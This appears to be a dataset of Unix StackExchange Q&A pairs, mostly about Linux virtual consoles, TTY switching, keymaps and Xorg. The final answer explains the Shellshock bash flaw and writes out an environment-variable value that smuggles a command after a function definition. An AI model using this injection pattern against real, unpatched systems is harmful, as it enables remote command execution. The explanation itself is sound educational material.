output
stringlengths 9
26.3k
| input
stringlengths 26
29.8k
| instruction
stringlengths 14
159
|
---|---|---|
X takes up a new slot in the kernel data structures that are used for the virtual consoles, exactly for the reason to allow Ctrl Alt Number to switch between the consoles and the X session.
This virtual console is not the console you started X from, but a different one. It is usually passed as an argument in form of vt1, vt2 etc. to the X server. So if you do something like ps axu | grep X, you should be able to see which virtual console the X session runs on.
On many distributions, this is virtual console 7 (and not 1), so you'll have to use Ctrl Alt 7 to switch to it. I'm not sure what Slackware uses as current default, however.
|
I remember switching between TTYs on Ubuntu Linux and being able to switch back and forth between an active X session (Unity/KDE/XFCE) and a terminal on another numbered TTY thing / virtual console. I expected the same thing to work in Slackware Linux, but it doesn't appear to and I'm trying to figure out why.
I'm running Slackware 14.2 on a ThinkPad. KDE is my default desktop environment (the one started by startx).
If I start an X session via startx on TTY1 (the default), switch to TTY2 via Ctrl Alt F2 and then switch back with Alt F1 (or Ctrl Alt F1), I don't see my X session, I see the shell session that I ran startx from. I can interact with the X process and suspend, interrupt, or kill it, but I can't "give it control of my monitor" again after switching away from TTY1 initially initially.
I tried running exec startx from my login shell instead of just startx, but I still don't see my X session when switching back to TTY1.
In addition to the fact that I've switched between a GUI and console in Ubuntu before using Ctrl Alt F{1,2,3,4,5,6,7}, this question suggests to me that it should be possible to switch between a virtual console containing a X session and one without an X session in it:
How to switch between tty and xorg session
Excerpt taken from one of the answers:Because X is running on tty1, but not on tty2. A tty is a "virtual
terminal", meaning it is supposed to represent an actual physical
screen and keyboard, etc. The terminals are all on simultaneously, but
since you only have enough hardware to interface with one at a time,
that's what you get.This suggests that X does actually run "on" a virtual console, but I'm not exactly sure what that means.
|
How To Switch to Virtual Terminal Running X11 as Subprocess of Login Shell?
|
As Arkadiusz Drabczyk said, readline is responsible for handling of C-v. Particularly C-v C-j. It just handles them differently. Supposedly because C-j (Enter) can be represented in a meaningful way w/o the ^* notation. And the letter in that notation is obtained by or'ing 0x40 to the character code, if you're curious. Or you might say, 0x01 corresponds to ^A, 0x02 to ^B, and so on.
As for vim that (^@) is also how it represents newlines. And there are a couple of mentions in the documentation:You can also use <NL> to separate commands in the same way as with '|'. To
insert a <NL> use CTRL-V CTRL-J. "^@" will be shown.https://github.com/vim/vim/blob/v8.2.4027/runtime/doc/cmdline.txt#L652-L653NL-used-for-Nul
Technical detail:
<Nul> characters in the file are stored as <NL> in memory. In the display
they are shown as "^@". The translation is done when reading and writing
files. To match a <Nul> with a search pattern you can just enter CTRL-@ or
"CTRL-V 000". This is probably just what you expect. Internally the
character is replaced with a <NL> in the search pattern. What is unusual is
that typing CTRL-V CTRL-J also inserts a <NL>, thus also searches for a <Nul>
in the file.https://github.com/vim/vim/blob/v8.2.4027/runtime/doc/pattern.txt#L1273-L1280
Probably it has something to do with storing null bytes as newlines in memory.
|
When I press Ctrl-V Ctrl-J in a shell (under urxvt), it starts a new line (positions the cursor at the beginning of a new line), instead of printing ^J.
In vim it prints ^@.
The same situation is in the virtual console.
Apparently something preprocesses Ctrl-J. What is it, and how do I influence it?
$ stty -a
speed 38400 baud; rows 26; columns 101; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;
eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk brkint ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff
-iuclc -ixany imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt
echoctl echoke -flusho -extproc$ echo $TERM
rxvt-unicode-256color$ urxvt --help |& head -1
rxvt-unicode (urxvt) v9.26 - released: 2021-05-14UPD I was configuring tmux and such behavior made me think that bind-key C-j send-keys C-j doesn't work.
|
Special handling of Ctrl-J
|
The Linux console driver doesn't support underlines on color displays because it's a compromise between readability and ease of implementation. It's been that way since the mid 1990s, and is documented in console_codes(4):
4 set underscore (simulated with color on a color display)
(the colors used to simulate dim or underline are set
using ESC ] ...)It's unlikely that you have anything other than a color display. You can change the color used for depicting underline, but it will be colored one way or another. The manual page mentions the escape sequence used to customize the palette:
ESC ] OSC (Should be: Operating system command) ESC ] P
nrrggbb: set palette, with parameter given in 7
hexadecimal digits after the final P :-(. Here n
is the color (0–15), and rrggbb indicates the
red/green/blue values (0–255). ESC ] R: reset
paletteand the escape sequences used to tell which of the 16 palette entries will show dim and underline:
ESC [ 1 ; n ] Set color n as the underline color.
ESC [ 2 ; n ] Set color n as the dim color.Setting TERM to any variant of "xterm" will give poor results, becauseLinux console driver lacks support for things that are found in the xterm terminal description, and
the linux terminal description is designed to use the actual features of the Linux console driver.Use infocmp linux xterm-256color to see the differences. It's long, so here's a summary to show the size of the difference:
$ infocmp -1x linux | wc -l
122
$ infocmp -1x xterm-256color |wc -l
272
$ infocmp -1x linux xterm-256color | wc -l
213
|
I'm on Arch Linux (a 32 bits alternative version), and recently I've discovered that the blue lines I used to see in Vim with :set cursorline were supposed to be underlined, and not blue.
That got me searching all around for a solution.
I'm using no graphical environment, so no desktop environment or window manager, only good ol' tty with zsh, my current favorite shell.
I've discovered that :hi CursorLine cterm=bold makes the cursor line a lot prettier, as it's now no longer blue, just a lighter color for the most part, and that's already made my life better.
I also tried cterm=underline (still renders the line blue), undercurl, tried :hi clear CursorLine then doing all over again, but nothing brings me the underlines I want.
I tried Vim on fbterm, because I believe it's a quasi-graphical terminal emulator, but I got the same behavior, only with an uglier super-wide font.
This not only applies to Vim, but to anything, it seems. I tried ANSI escape sequences on echoes, and when trying to underline text, I also got that blue color without underlines.
So I believe something is missing, be it a font, a shell config, a Vim config or whatever.
After searching quite a bit, I got no closer to an answer as to why my tty lacks those formatting options, so I decided to ask here.
It's also worth noting that I tried this on a Raspberry Pi 3B+ running Raspbian, and I got pretty much the same behavior on the tty.
The only place I managed to get that to work was on the X server I start from time to time to use Firefox. I spawned xterm on it and voila I got underlines even while typing commands on zsh.
I'll now try playing around with different terminal fonts to see if I get any closer to prettifying my tty.
Edit 01:
I recorded it with Asciinema, and it shows just fine there, but what I was actually seeing is as I described.Edit 02:
I was reading this Arch Wiki page on the section about terminal emulators, and decided to try yaft, as it sounded it could be just the thing I was looking for.
It turned out I already had it installed, and using it does indeed enable at least some of the features I wanted, so that's great.
|
How to enable underlines and other formattings on a color tty?
|
This is an extended comment and not an answer.
In my system, in which Ctrl+Alt+F1 works correctly, I get a KeyPress event for control and alt, but not for F1. Though I know it works since I'm transfered to tty1.
This is the complete xev output in my case (just for comparison):
root@debi64:/home/gv/Desktop/PythonTests# xev -event keyboard
Outer window is 0x4400001, inner window is 0x4400002KeymapNotify event, serial 18, synthetic NO, window 0x0,
keys: 4294967192 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 KeyPress event, serial 25, synthetic NO, window 0x4400001,
root 0x281, subw 0x0, time 11550957, (157,186), root:(748,462),
state 0x0, keycode 64 (keysym 0xffe9, Alt_L), same_screen YES,
XLookupString gives 0 bytes:
XmbLookupString gives 0 bytes:
XFilterEvent returns: FalseKeyPress event, serial 28, synthetic NO, window 0x4400001,
root 0x281, subw 0x0, time 11550960, (157,186), root:(748,462),
state 0x8, keycode 37 (keysym 0xffe3, Control_L), same_screen YES,
XLookupString gives 0 bytes:
XmbLookupString gives 0 bytes:
XFilterEvent returns: FalseKeyRelease event, serial 28, synthetic NO, window 0x4400001,
root 0x281, subw 0x0, time 11553775, (157,186), root:(748,462),
state 0xc, keycode 67 (keysym 0x1008fe01, XF86Switch_VT_1), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: FalseKeyRelease event, serial 28, synthetic NO, window 0x4400001,
root 0x281, subw 0x0, time 11553902, (157,186), root:(748,462),
state 0xc, keycode 37 (keysym 0xffe3, Control_L), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: FalseKeyRelease event, serial 28, synthetic NO, window 0x4400001,
root 0x281, subw 0x0, time 11553902, (157,186), root:(748,462),
state 0x8, keycode 64 (keysym 0xffe9, Alt_L), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: FalseKeymapNotify event, serial 28, synthetic NO, window 0x0,
keys: 4294967169 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ClientMessage event, serial 28, synthetic YES, window 0x4400001,
message_type 0x11b (WM_PROTOCOLS), format 32, message 0x119 (WM_DELETE_WINDOW)I also created a small python script that simulates the Ctrl+alt+F1 key press. When I run the script, I'm also transferred in tty1 without problem.
You could even try to run this script in your machine to see if you go or not at tty1, as a double check / verification that your keyboard works ok:
https://github.com/gevasiliou/PythonTests/blob/master/pykey-test.py
PS: Instead of script, you could also try to run #chvt 1 that should transfer you also to tty1.
After some research it has been reported by other users that Ctrl+alt+fn keys have stopped working due to xserver updates (obviously), which modified some resolution settings that apply in tty's.
For example in this post, the problem has been solved by applying a specific vga resolution during boot as a kernel parameter (vga=mode), like vga=0x0362. Obviously one of those system updates messed up resolutions in those guys, so maybe this is also your case (and only god knows why).
PS: To see available supported modes for your system you need to run hwinfo --framebuffer | grep 'Mode' and to select a mode from the ones that will be listed.
By the way, you have included some part of xev with F3 in your question, but what is the output with F1?
UPDATE:
As a further troubleshooting it could worth to try some of the following:Looking at xrandr source code it seems that the --off option executes the following commands:
set_name_xid (&config_output->mode, None);
set_name_xid (&config_output->crtc, None);
config_output->changes |= changes_mode | changes_crtc;You could try to reenable the --output by specifying --mode and --crtc xrandr options instead of --auto (just in case that xrandr "automation" is not working correctly).In this kernel document about console, you can see what are the drivers / supported modules for operation of virtual consoles under directory /sys/class/vtconsole.
You could compare values of all the files/modules during power on and after power off that you have a different behavior.
Maybe something is modifying those values in the -off time.This is a printout of my system in which switch to tty1-2-3-4-5-6 works ok:
root@debi64:/home/gv/Desktop/PythonTests# for f in $(find /sys/class/vtconsole/vtcon0/ -type f);do echo -e "File : $f \c\c\c";echo -e "-VALUE : \c";cat $f;done
File : /sys/class/vtconsole/vtcon0/bind -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/runtime_active_kids -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/runtime_suspended_time -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/autosuspend_delay_ms -VALUE : cat: /sys/class/vtconsole/vtcon0/power/autosuspend_delay_ms: Input/output error
File : /sys/class/vtconsole/vtcon0/power/runtime_enabled -VALUE : disabled
File : /sys/class/vtconsole/vtcon0/power/runtime_active_time -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/control -VALUE : auto
File : /sys/class/vtconsole/vtcon0/power/async -VALUE : disabled
File : /sys/class/vtconsole/vtcon0/power/runtime_usage -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/runtime_status -VALUE : unsupported
File : /sys/class/vtconsole/vtcon0/uevent -VALUE :
File : /sys/class/vtconsole/vtcon0/name -VALUE : (S) VGA+
root@debi64:/home/gv/Desktop/PythonTests# for f in $(find /sys/class/vtconsole/vtcon1/ -type f);do echo -e "File : $f \c\c\c";echo -e "-VALUE : \c";cat $f;done
File : /sys/class/vtconsole/vtcon1/bind -VALUE : 1
File : /sys/class/vtconsole/vtcon1/power/runtime_active_kids -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/runtime_suspended_time -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/autosuspend_delay_ms -VALUE : cat: /sys/class/vtconsole/vtcon1/power/autosuspend_delay_ms: Input/output error
File : /sys/class/vtconsole/vtcon1/power/runtime_enabled -VALUE : disabled
File : /sys/class/vtconsole/vtcon1/power/runtime_active_time -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/control -VALUE : auto
File : /sys/class/vtconsole/vtcon1/power/async -VALUE : disabled
File : /sys/class/vtconsole/vtcon1/power/runtime_usage -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/runtime_status -VALUE : unsupported
File : /sys/class/vtconsole/vtcon1/uevent -VALUE :
File : /sys/class/vtconsole/vtcon1/name -VALUE : (M) frame buffer deviceFinally, could be worthwhile to investigate possible automatic power saving features like Xserver DPMS settings that could be automatically activated in long periods of inactivity. Second Update:
Looking around i found that DPMS and other usefull power save related setting on virtual terminals can be controlled with setterm command.
In the case that your virtual terminals seems to be sleeping , you could try to wake them up (if this is the case) by sending a setterm --reset command to them.
To send a command from your regular tty7 to another tty you need to use:
setsid bash -c 'exec setterm --reset <> /dev/tty1 >&0 2>&1'
The only problem is that you must be logged in at tty1.
For testing you can use
setsid bash -c 'exec setterm --reverse on <> /dev/tty1 >&0 2>&1' and while your tty1 is working if you switch to it with chvt 1 you can observe the results (reverse on swaps colors in terminal - tested and working in Debian).
Moreover setterm gives you options to enable/disable powersave using setterm --powersave off, and many more (see man setterm)
|
(After editing significant new infos into the question)
After turning a display off from command line (xrandr --output ... --off), and then turning it back (xrandr --output ... --auto), my X desktop loses the capability to switch to a character console (i.e. alt/ctrl/f1 doesn't work any more).
Other X controlling shortcuts (alt/ctrl/backspace) still work.
Why? How to re-enable this feature?Info: it is Linux Mint, latest stable. The problems happens explicitly after I switched the X off with an xrandr --output ... --off from command line, and then turned it on next morning again (with an xrandr --output ... --auto command).
I use this, because I need to completely turn it off before I go home and the normal settings (energy settings somewhere in the control panel) aren't enough or buggy.
My keyboard is okay, for example, xev shows the alt/ctrl/f3 release event correctly:
KeyRelease event, serial 37, synthetic NO, window 0x3c00001,
root 0x2e1, subw 0x0, time 1622285717, (99,77), root:(961,532),
state 0xc, keycode 69 (keysym 0x1008fe03, XF86Switch_VT_3), same_screen YES,
XLookupString gives 0 bytes:
XFilterEvent returns: FalseBut the keypress event is not in the list. Thus, xev can't see the press of alt/ctrl/f3, but somehow it can see its release.Debug output:
$ xmodmap -pke|grep -i xf86switch
keycode 67 = F1 F1 F1 F1 F1 F1 XF86Switch_VT_1 F1 F1 XF86Switch_VT_1
keycode 68 = F2 F2 F2 F2 F2 F2 XF86Switch_VT_2 F2 F2 XF86Switch_VT_2
keycode 69 = F3 F3 F3 F3 F3 F3 XF86Switch_VT_3 F3 F3 XF86Switch_VT_3
keycode 70 = F4 F4 F4 F4 F4 F4 XF86Switch_VT_4 F4 F4 XF86Switch_VT_4
keycode 71 = F5 F5 F5 F5 F5 F5 XF86Switch_VT_5 F5 F5 XF86Switch_VT_5
keycode 72 = F6 F6 F6 F6 F6 F6 XF86Switch_VT_6 F6 F6 XF86Switch_VT_6
keycode 73 = F7 F7 F7 F7 F7 F7 XF86Switch_VT_7 F7 F7 XF86Switch_VT_7
keycode 74 = F8 F8 F8 F8 F8 F8 XF86Switch_VT_8 F8 F8 XF86Switch_VT_8
keycode 75 = F9 F9 F9 F9 F9 F9 XF86Switch_VT_9 F9 F9 XF86Switch_VT_9
keycode 76 = F10 F10 F10 F10 F10 F10 XF86Switch_VT_10 F10 F10 XF86Switch_VT_10
keycode 95 = F11 F11 F11 F11 F11 F11 XF86Switch_VT_11 F11 F11 XF86Switch_VT_11
keycode 96 = F12 F12 F12 F12 F12 F12 XF86Switch_VT_12 F12 F12 XF86Switch_VT_12The command xmodmap -pke | grep ' F[0-9]\+' gives exactly the same result.Additional info: the capability to switch to character console was lost on power off, and not on power on (thus, I had to ssh into my workstation from my mobile to enter the xrandr --output ... --auto command).Scripting test: I've tried @GeorgeVasilou 's script, what emulates the keyboard hits by injecting X11 event. The result is negative, the emulated alt/ctrl/f1 sequence appears only as a single H.
|
X: alt/ctrl/f1 doesn't work any more after turning the display off and on again with xrandr
|
Set PS1 conditionally on the value of $TTY. The first virtual console is /dev/ttyv0, the second one is /dev/ttyv1, etc.
For zsh, do it in ~/.zshrc. For bash, do it in ~/.bashrc.
if [[ $TTY == /dev/ttyv[1-9]* ]]; then
PS1="[${TTY#/dev/ttyv}] $PS1"
fiThe code for doing just this is the same in bash and zsh. If you want further effects in your prompt (current directory, host name, colors, …), the format of PS1 depends on the shell: zsh and bash both support prompt escapes, but they're completely different.
|
When I use virtual consoles ALT-F<1~n> in FreeBSD, I want my 'zsh', 'sh' (and possibly other shells) startup scripts to include the virtual console number in the prompt, if it's not the default console '1'.
How do I do that?
|
How to include my virtual console ID in the prompt, in FreeBSD
|
For unknown reasons (bug?) you have to explicitly use the -t flag to specify the console type, which can be any of the two serial of pv. Either works!
So either of the following two work:
sudo xl console -t pv sys-net
sudo xl console -t serial sys-net
But this won't work for sys-net:
sudo xl console sys-net
$ xl console --help
Usage: xl [-v] console [options] <Domain>
-t <type> console type, pv or serial
-n <number> console numberAttach to domain's console.[ctor@dom0 ~]$ sudo xl console -t pv sys-net Fedora 28 (Twenty Eight)
Kernel 4.14.67-1.pvops.qubes.x86_64 on an x86_64 (hvc0)sys-net login:[ctor@dom0 ~]$ sudo xl console -t serial sys-net Fedora 28 (Twenty Eight)
Kernel 4.14.67-1.pvops.qubes.x86_64 on an x86_64 (hvc0)sys-net login: [ctor@dom0 ~]$ sudo xl console sys-net
xenconsole: Could not read tty from store: No such file or directory[ctor@dom0 ~]$ rpm -qf `which xl`
xen-runtime-4.8.4-2.fc25.x86_64Note: Exit console by pressing Ctrl+]
sys-net has Virtualization mode set to HVM. All the other VMs have it set to default (PVH). That seems to be the main difference.
|
I tried xl console sys-net which is something that works for any other VM (AppVM, TemplateVM), it even works for sys-net-dm (I don't know what that is though)
[ctor@dom0 ~]$ time sudo xl console sys-net
xenconsole: Could not read tty from store: No such file or directoryreal 0m5.036s
user 0m0.005s
sys 0m0.015s[ctor@dom0 ~]$ rpm -qf `which xl`
xen-runtime-4.8.4-2.fc25.x86_64
|
On Qubes OS 4.0, how to get xl console access to sys-net?
|
I can only tell you a dirty workaround.
Use xbindkeys and add to ~/.xbindkeysrc:
"sudo chvt $(($XDG_VTNR-1))"
alt + c:113"sudo chvt $(($XDG_VTNR+1))"
alt + c:114If you don't have XDG_VTNR variable, then you have to hardcode previous/next vt.
You also have to put yourself into /etc/sudoers:
USER ALL=NOPASSWD:/bin/chvt
|
One can change virtual consoles (or virtual terminals, VTs) by pressing Ctrl+Alt+Fn (where Fn represents F1, F2, etc.). In addition, when not running X, one can press Alt and the arrow keys to cycle through VTs (Alt← to decrement and Alt→ to increment the virtual terminal).
However, if X is running on one of the VTs, the arrow key bindings are not typically set and one must fall back to Ctrl+Alt+Fn to change to another VT.
I generally prefer using the arrow bindings to change VTs. To avoid having to switch between key bindings (Ctrl+Alt+Fn for VTs with X; arrows for VTs without it), to what command would one bind Alt←/→ for decrementing/incrementing the VT in X?
In case the answer depends on the system, I am running debian and using dwm and openbox as window managers.
|
key binding to increment/decrement virtual console in X
|
Starting the X server and then exiting it seems to fix the problem. A bit heavy-handed, but better than rebooting.
|
I have a KVM switch sharing my USB keyboard between Linux and Windows systems. If the switch is set to the Linux box when it boots up then the keyboard works fine. If I switch away to the Windows box the keyboard still works fine, but if I switch back to Linux I start getting missed and repeated keystrokes, making it almost unusable. This is on a virtual terminal and the problem carries across to the other vts as well.
Is there some way that I can reset the keyboard or its driver without having to reboot?
I'm running an ancient Fedora Core 8 distro, if that matters.
Thanks.
|
How to reset keyboard driver?
|
You are mis-remembering how Xorg used to work :). Remember that X used to start on VT7 and up, because VT1 through VT6 were reserved for text consoles.
With systemd and logind, by default the VTs are set up on-demand. If you never switched to VT2, then getty and login are not started on VT2. Instead, VT2 remains available... and can be claimed by a program like Xorg, which uses the first free VT.
Another way to see that your Xorg session is actually on VT2, is that ps -ax will show that it has tty2 as its controlling terminal.
In the old system, if you logged in to a text VT and started Xorg, it would never re-use your current text VT. I was confused because startx re-uses your text VT on a modern system - but this is due to using logind. With logind, X is able to start as an unprivileged process... and it does not have the privilege to switch to a different VT. The -keeptty option mentioned in the log message was added specifically for this reason.I suggest not trying to run Xorg -keeptty inside sudo -i. -keeptty was not specifically intended for this case. Or at least, it does not work correctly on my system, it seems the old and the new code start fighting with each other :) -
I get a screen showing a text cursor (underline) which is not flashing, and "ctrl+alt+f6" does not switch to text vt6; I have to use alt+sysrq+R first. (I have enabled sysrq on my Fedora system). Switching back to the original vt with "ctrl+alt+f5" then shows the black screen that I would have expected. The controlling terminal of the X process is tty5, but lsof -p shows that it also has tty2 open. Switching to VT2 dumps me back on VT5, with Xorg logging an error
[ 40399.826] (II) AIGLX: Suspending AIGLX clients for VT switch
[ 40399.826] (II) AIGLX: Resuming AIGLX clients after VT switch
[ 40399.826] (EE) modeset(0): failed to set mode: Permission denied
[ 40399.826] (EE)
Fatal server error:
[ 40399.827] (EE) EnterVT failed for screen 0
[ 40399.827] (EE)
[ 40399.827] (EE)
Please consult the Fedora Project support
at http://wiki.x.org
for help.
[ 40399.827] (EE) Please also check the log file at "/var/log/Xorg.10.log" for additional information.
[ 40399.827] (EE)
[ 40399.828] (II) AIGLX: Suspending AIGLX clients for VT switch
[ 40400.029] (EE) Server terminated with error (1). Closing log file.
|
Version of affected software:
$ rpm -q --whatprovides /usr/bin/Xorg
xorg-x11-server-Xorg-1.19.6-8.fc28.x86_64(In other words, this is on a currently up-to-date install of Fedora 28 Workstation).
Steps to reproduce:Use ctrl+alt+f5, to switch to text vt 5 and log in
sudo -i
Xorg :10
Use ctrl+alt+f6, to switch to text vt 6
Use ctrl+alt+f5, to switch back to vt 5Expected results: I see the graphical X session (a completely black screen with no mouse cursor :).
Actual results: I see a text console with some log messages from Xorg. The Xorg process is still running.
Additional information:
The last line shown on the screen is
(II) AIGLX: Suspending AIGLX clients for VT switchAlso, /var/log/Xorg.10.log shows that Xorg is not using systemd-logind.
(II) systemd-logind: logind integration requires -keeptty and -keeptty was not provided, disabling logind integration
|
Why is VT switching not working for Xorg run as root?
|
There's a terminal emulator program built into the Linux kernel. It doesn't manifest as a running process with open file handles. It's layered on top of the framebuffer and the input event subsystem, which it uses internal kernel interfaces to access. It presents itself to application-mode systems as a series of kernel virtual terminal devices, /dev/tty1 and so forth, a pseudo-file under /sys that shows the active KVT number, and a series of CGA-style video buffer devices, /dev/vcsa1 and so forth.
Normally, it is the kernel terminal emulator that recognizes the ⎇Alt+FN key chords. It's all done entirely within kernel-mode code. (You can build a kernel that does not have this code, by using the CONFIG_VT kernel build option.)
Applications softwares can disable this, however. An Xorg server does so, for example. When it is active on-screen, it temporarily turns off or disconnects most of the kernel terminal emulator, recognizes its own key chords (⎈Control+⎇Alt+FN), and uses ioctl() system calls to switch the active KVT away under program control. Effectively, the Xorg server is using the KVT switching as a means to negotiate exclusive access to the framebuffer and the HIDs that it is sharing with the kernel's built-in terminal emulator.
Further readinghttps://unix.stackexchange.com/a/333922/5132
https://unix.stackexchange.com/a/178807/5132
https://unix.stackexchange.com/a/489983/5132
https://unix.stackexchange.com/a/177209/5132
https://unix.stackexchange.com/a/194218/5132
|
With Alt + Fn you can switch between virtual consoles in most Linux distributions. What application handles the switching of consoles and how? I suppose it has to read the keyboard input before all other processes. Or is it handled by a device driver or another kernel module?
|
What application manages the consoles
|
ERROR: type should be string, got "\nhttps://unix.stackexchange.com/a/4132/153329pseudo-ttys, are provided (through a thin kernel layer) by programs called terminal emulators, such as Xterm (running in the X Window System), Screen (which provides a layer of isolation between a program and another terminal), Ssh(which connects a terminal on one machine with programs on another machine)With ssh user@ip you get shell running in pseudo-terminal (not X11 terminal emulator).\nWith ssh -X you get X11 forwarding - an SSH protocol that enables users to run graphical applications on a remote server and interact with them using their local display and I/O devices.\nX11 uses a client-server model, where an X Server is a program on a machine which manages access to graphical displays and input devices (monitors, mice, keyboards, etc.), and an X Client is a program which handles graphical data.\nX Servers and X Clients can communicate over remote network.\n" |
As far as I've understood, a terminal emulator is a GUI-based program which gives me a terminal-like viewport and allows me to interact with it just like I'd do with a terminal, except that it has all the support from the X system, so I suspect that ssh user@ip will not give me access to a terminal emulator running on the remote machine. If I want to use that, I need to connect to that machine via VNC, and then open a terminal emulator window in that desktop.
But do I get access to a virtual console (one that, physially on the remote machine I'd get via Ctrl+Alt+F2, for instance)? I can ssh -X ..., which gives me access to the clipboard, which comes with X, so it kind of feels I'm not in a virtual console either...As regards the proposed duplicate, since my question is specifically about SSH, the information I can gather is the following:Ssh (which connects a terminal on one machine with programs on another machine)from the accepted answer,pseudoterminals use PTY “devices” to arrange communication between console applications and the terminal-making program that runs in userspace. Examples are X-based terminal emulators and sshd, that allocates a pseudotty for each login session.from another answer,There may be some application that "emulates" terminal accepting keystrokes from user and sending them somewhere (xterm and ssh are good examples). There is an API in Kernel called pseudo terminal for that. So your tty may really be connected to some application instead of real terminal. Xterm uses X11 to display text and ssh uses network connection for it.from yet another answer;so the answer to my question seems to be "it gives access to a pseudo terminal".
|
Does ssh give access to the virtual console, to a terminal emulator, or what? [duplicate]
|
Okay, I found an alternative way to declare it that works: the number system described in the manpage of keymaps. Note that in /usr/share/keymaps/i386/qwerty/us.map.gz (unpacked), there is the line keymaps 0-2,4-6,8-9,12, ommitting 3, which is what I need (Shift+AltGr). So my file now looks like this, and that works fine:
include "us.map"keymaps 0-3keycode 22 = u U udiaeresis Udiaeresis
keycode 24 = o O odiaeresis Odiaeresis
keycode 30 = a A adiaeresis Adiaeresis
keycode 31 = s S ssharpI still don't understand the error in the question though.
|
I am using Artix Linux with OpenRC.
I want to define a custom console keymap to generally use the US-design, but add some extra functionality for German umlauts. The following does work:
/usr/share/keymaps/i386/qwerty/mymap.map:
include "us.map"altgr keycode 30 = adiaeresisActivating with rc-update add keymaps boot /rc-service keymaps restart as described here.
With these configurations, when I press AltGr+a, ä gets printed as intended.
I want to do the same for AltGr+Shift+a to produce Ä. However, adding the line
shift altgr keycode 30 = Adiaeresis to my keymap, then restarting the service yields the following error:
Setting keyboard mode [UTF-8] ... [ ok ]
Loading key mappings [mymap] ...
adding map 3 violates explicit keymaps line
Error leading key mappings [ !! ]
ERROR: keymaps failed to startWhat does that tell me and how can I fix it?
altgr shift keycode 30 = Adiaeresis has the same result.
I also tried to modify the existing line to altgr keycode 30 = adiaeresis Adiaeresis, but that yields syntax error, unexpected LITERAL, expecting EOL.
I use this as a reference, but i find it hard to read and interpret.
|
shift altgr combination for console keymap
|
In vgacon, the hardware chooses the width, and it’s always the full width of a character cell — that’s all that VGA supports. mdacon is similar, for the same reason.
Other console implementations with cursor size handling can be found by looking for CUR_UNDERLINE. Some of them, such as fbcon, could theoretically support cursors of varying widths too, but they all match the behaviour of the original Linux console (the VGA one) and use a fixed width.
|
In the Linux source code, specifically in linux/drivers/video/console/vgacon.c, there is a switch case block for cursor shapes. Each of these shapes are rectangles of the same width and varying heights. Clearly, Linux handles the height of the cursor, but does it handle the width? Does Linux choose the width, or does the GPU decide? Does this vary between the other *.cons, (some of which have switch cases of cursors)?
|
What handles virtual console cursor specifics?
|
Solaris 10 does not have virtual consoles. The were not introduced to Solaris until Solaris 11.
The major customers for Solaris tend to be large-scale enterprises, where the ability to use virtual consoles isn't needed as much as it is for desktop systems.
|
I refuse to think solaris 10 no virtual consoles
I did
svcadm enable svc:/system/console-login:defaultnothing happen,no virtual consoles,service remain offline
and no error is given
if i start the script of this smf service give me this command
/usr/lib/saf/ttymon -g -d /dev/console -l console -m ldterm,ttcompat -h -p solaris10.blu.privata console login: and on console i see..no output
of course solaris10.blu.privata is reachable by ping.
So..no virtual consoles?Or there is other way?
|
solaris 10..no virtual consoles?
|
Why are there so many ttys?In the past there was no graphical subsystem, no apps like screen/tmux, so multiple consoles allowed to be able to easily switch between multiple running tasks [under multiple users] simultaneously.Are multiple tty necessary?No, you may as well have a single one.Why are multiple things spread in different ttys? For eg i have the runit logs on tty1, wm on tty7, and a blinking white cursor on the corner of screen on tty8. Why not everything in one tty?Historical conventions.Why not everything in one tty?If you have the only console and you run Xorg on top of it, you no longer have this console. In case Xorg misbehaves you're left with a semifunctional system.Why doesn't linux place these in order - tty1: runit logs, tty2: wm, etc.Historical conventions. You may reconfigure everything however you like.How to get fewer ttys with Systemd?
https://wiki.archlinux.org/title/getty
man 5 logind.conf
Where Xorg runs depends on your display manager.What does the binking cursor mean?An unitialized console with no applications running on it.
|
Why are there so many ttys? Are multiple tty necessary?
Why are multiple things spread in different ttys? For eg i have the runit logs on tty1, wm on tty7, and a blinking white cursor on the corner of screen on tty8. Why not everything in one tty?
Why doesn't linux place these in order - tty1: runit logs, tty2: wm, etc.
What does the binking cursor mean?
|
Questions about tty
|
bash stores exported function definitions as environment variables. Exported functions look like this:
$ foo() { bar; }
$ export -f foo
$ env | grep -A1 foo
foo=() { bar
}That is, the environment variable foo has the literal contents:
() { bar
}When a new instance of bash launches, it looks for these specially crafted environment variables, and interprets them as function definitions. You can even write one yourself, and see that it still works:
$ export foo='() { echo "Inside function"; }'
$ bash -c 'foo'
Inside functionUnfortunately, the parsing of function definitions from strings (the environment variables) can have wider effects than intended. In unpatched versions, it also interprets arbitrary commands that occur after the termination of the function definition. This is due to insufficient constraints in the determination of acceptable function-like strings in the environment. For example:
$ export foo='() { echo "Inside function" ; }; echo "Executed echo"'
$ bash -c 'foo'
Executed echo
Inside functionNote that the echo outside the function definition has been unexpectedly executed during bash startup. The function definition is just a step to get the evaluation and exploit to happen, the function definition itself and the environment variable used are arbitrary. The shell looks at the environment variables, sees foo, which looks like it meets the constraints it knows about what a function definition looks like, and it evaluates the line, unintentionally also executing the echo (which could be any command, malicious or not).
